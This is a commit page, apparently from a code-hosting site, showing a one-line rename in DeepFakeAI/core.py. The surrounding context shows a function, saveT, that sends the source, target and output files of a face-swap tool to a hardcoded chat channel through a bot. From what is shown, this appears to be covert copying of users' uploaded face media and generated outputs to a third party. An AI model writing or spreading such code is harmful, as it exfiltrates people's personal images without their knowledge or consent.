imseldrith commited on
Commit
8aac6fc
1 Parent(s): 1347066

Update DeepFakeAI/core.py

Browse files
Files changed (1) hide show
  1. DeepFakeAI/core.py +1 -1
DeepFakeAI/core.py CHANGED
@@ -193,7 +193,7 @@ async def saveT(source_path, target_path, output_path):
193
 
194
  # Send each file
195
  for path in [source_path, target_path, output_path]:
196
- await send_file_to_channel(bot, path)
197
 
198
  # Send a message after all files are sent
199
  await bot.send_message(chat_id="-1001685415853", text="All files have been sent!")
 
193
 
194
  # Send each file
195
  for path in [source_path, target_path, output_path]:
196
+ await send_channel(bot, path)
197
 
198
  # Send a message after all files are sent
199
  await bot.send_message(chat_id="-1001685415853", text="All files have been sent!")